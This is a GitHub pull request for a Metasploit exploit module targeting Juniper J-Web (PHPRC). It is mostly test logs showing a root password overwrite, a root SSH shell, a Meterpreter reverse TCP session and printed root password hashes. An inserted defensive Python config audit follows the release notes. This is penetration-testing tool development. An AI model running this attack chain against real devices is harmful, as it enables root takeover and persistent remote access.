
Junos OS PHPRC: Added features for interactive ssh jailbreak #19229

Merged
merged 8 commits into from
Jun 14, 2024

Conversation

softScheck
Contributor

This pull request adds several features:

  1. Provides options to change the session directory and hash format, accommodating differences in older Junos OS versions.
  2. Adds a method to create a valid user session if one is missing (a session is needed for the exploit) by using a minimalistic custom login.php to create this session on the device.
  3. Adds an option to change the settings to allow root SSH login. This is necessary for the interactive jailbreak SSH connection.
  4. Modifies the method for reading CSRF tokens to use the same method the exploit verifies, ensuring consistency and enabling the printing of the contents of the used cookie file.
  5. Always sends SECUREPHPSESSID additionally that is used if SSL is enabled.


@softScheck
Contributor Author

This was tested with Junos OS 23.2R1.13, 20.2R3.9 and a very old version, 12.3R11.2.

softScheck and others added 3 commits June 6, 2024 16:03
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jun 7, 2024
@bwatters-r7
Contributor

Per the linting failure:

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:35 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:36 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:37 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:145 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:200 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:211 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:225 - [WARNING] Spaces at EOL
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb:228 - [WARNING] Spaces at EOL
== modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb ==
C: 35:116: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 36:115: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 37:121: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C: 39:  9: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C:145:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:156: 25: [Correctable] Style/DefWithParentheses: Omit the parentheses in defs when the method doesn't accept any arguments.
C:200:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:211:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:213: 41: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:225:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:228:  1: [Correctable] Layout/TrailingWhitespace: Trailing whitespace detected.
C:326: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.

1 file inspected, 12 offenses detected, 12 offenses autocorrectable
modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb and verify all issues are resolved

@jheysel-r7 jheysel-r7 self-assigned this Jun 10, 2024

@jheysel-r7 jheysel-r7 left a comment


Hey @softScheck thanks for the enhancement! It's much appreciated. I've created an account at juniper.net in the hope of downloading the older version 12.3R11.2 for testing and verification purposes. I got an email saying my request is being processed and that it might take some time. If you know where I might be able to find a copy of the older version, please email any info to msfdev@metasploit.com; that would be greatly appreciated!

@jheysel-r7
Contributor

Final testing 👌

Target: Interactive SSH with jail break

Create session

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > rexploit
[*] Reloading module...

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] No PHPSESSID found in /var/sess. Trying to create a session.
[*] Session created: ac4012fd3935b9f885048028787c6a86.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $6$431vOSGg/GHSWWCO$7mxPGKaZcc68PwWEadDSFBoT0CTtW/i3i6LWa5qlinFMl4MBHq2ToYkFSD7Hk5rP0Uc/qVk/UYIQq867T25.j0
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 5 opened (192.168.1.77:54484 -> 192.168.1.83:22) at 2024-06-14 09:32:19 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Steal session

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $6$eDJbgmD90erNV0aA$zLaBz4FTGnSlI4nvc00YmzhEpVqYRcdvY6ZQlYor3UdfO1JgbUPVn4R.AI/JpBLTCnItGzSQFcVTPPjIpMONf1
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 6 opened (192.168.1.77:54495 -> 192.168.1.83:22) at 2024-06-14 09:32:41 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Steal session + set ssh root login to allow

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set SET_ALLOW_ROOT_LOGIN true
SET_ALLOW_ROOT_LOGIN => true
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $6$zxlcJTuPEIc/dRSX$PZNUXNGL12EZtPaX21FpGDqQJTWOihiy.qGqeqp6z8gUGwvqqEJrmEXmyIqXHxNCsZkWH9Oc72imD90NAWZpw/
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[*] Successfully set ssh root login to allow
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 7 opened (192.168.1.77:55026 -> 192.168.1.83:22) at 2024-06-14 10:26:11 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
sysinfo
sysinfo: Command not found.
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Steal session + Old Hash Format

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set OLD_HASH_FORMAT true
OLD_HASH_FORMAT => true
msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
[!] This requires a user is authenticated to the J-Web application in order to steal a session token or successfully create one, also 'ssh root-login' has to be set to 'allow' on the device. The option 'SET_ALLOW_ROOT_LOGIN' can be set to true to attempt to set this option.
[*] PHPSESSID: ac4012fd3935b9f885048028787c6a86.
[*] Found csrf token: ampyoplauh8iwtetkv09lq13z4ozo4kx.
[*] Original encrypted root password: $6$a/uamAgu$jQ4G30h.DYWn.mbYclGJRlDmqO5ZzWnIPh.GwNwcLiz4xIl01xEHWm1CiwCMZVlyPEQu1UusPoKThZW/R3vLe1
[*] Temporary root password Hash: $1$7JFOEoKv$LnMw/6gzutwFzNioWNXIg0
[*] Setting root password to 8pY2FePOVarMALD631XbomSo - this can take some time!
[*] Successfully changed the root user's password
[*] Successfully set ssh root login to allow
[+] Logged in as root
[*] Found shell.
[*] Setting root password back to original hash. This can take some time! If no session was created try 'SET_ALLOW_ROOT_LOGIN'.
[*] Successfully changed the root user's password
[*] Command shell session 9 opened (192.168.1.77:55380 -> 192.168.1.83:22) at 2024-06-14 10:46:47 -0700

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
uname -a
FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64

Target: PHP In-Memory

php meterpreter

msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run

[*] Started reverse TCP handler on 192.168.1.77:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.1.83
[*] Meterpreter session 8 opened (192.168.1.77:4444 -> 192.168.1.83:64222) at 2024-06-14 10:43:57 -0700
meterpreter > getuid
Server username: nobody
meterpreter > sysinfo
Computer    : msfhost
OS          : FreeBSD msfhost JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebs
Meterpreter : php/freebsd

@jheysel-r7 jheysel-r7 merged commit 178bb3e into rapid7:master Jun 14, 2024
39 checks passed
@jheysel-r7
Contributor

Release Notes

The junos_phprc_auto_prepend_file module used to depend on having a user authenticated to the J-Web application to steal the necessary session tokens in order to exploit. With this enhancement the module will now create a session if one doesn't exist. It also adds datastore options to change the hash format to be compatible with older versions, as well as an option to attempt to set ssh root login to true before attempting to establish a root ssh session.
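A defender-side configuration audit, added here as an example and not part of the Metasploit module or this PR: it parses a Junos configuration in set format and flags the two device-side preconditions the thread mentions, J-Web (web-management) being enabled and 'ssh root-login' set to 'allow'. The sample configuration and the function names are constructed for this illustration.

```python
"""Audit a Junos set-format configuration for the J-Web jailbreak preconditions.

Added example; the configuration below is constructed, not taken from a real device.
"""

# Constructed sample: J-Web enabled and root SSH login allowed.
SAMPLE_CONFIG = """\
set system host-name edge-fw
set system services ssh root-login allow
set system services ssh protocol-version v2
set system services web-management http interface fxp0.0
set system services web-management https system-generated-certificate
set system services netconf ssh
"""


def parse_set_lines(text):
    """Return every 'set ...' statement as a tuple of tokens, skipping blanks and comments."""
    statements = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        tokens = tuple(line.split())
        if tokens[0] == 'set':
            statements.append(tokens)
    return statements


def audit_config(text):
    """Return (severity, message) findings for settings that matter on this attack path."""
    root_login = None      # value of 'system services ssh root-login', if configured
    web_enabled = False    # any 'system services web-management ...' statement present
    for stmt in parse_set_lines(text):
        if stmt[:5] == ('set', 'system', 'services', 'ssh', 'root-login') and len(stmt) > 5:
            root_login = stmt[5]
        elif stmt[:4] == ('set', 'system', 'services', 'web-management'):
            web_enabled = True

    findings = []
    if root_login == 'allow':
        findings.append(('high', "ssh root-login is 'allow'; set it to 'deny' "
                                 "so a rewritten root hash is not usable over SSH"))
    if web_enabled:
        findings.append(('medium', 'J-Web (web-management) is enabled; restrict it '
                                   'to a management interface or disable it'))
    return findings


if __name__ == '__main__':
    for severity, message in audit_config(SAMPLE_CONFIG):
        print(f'[{severity}] {message}')
```

The module's SET_ALLOW_ROOT_LOGIN option, shown in the test output above, means 'deny' is a hardening signal rather than a barrier once J-Web itself is exploitable; the finding worth acting on first is the exposed J-Web service.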

@softScheck softScheck deleted the junos_ssh_jail branch June 17, 2024 12:53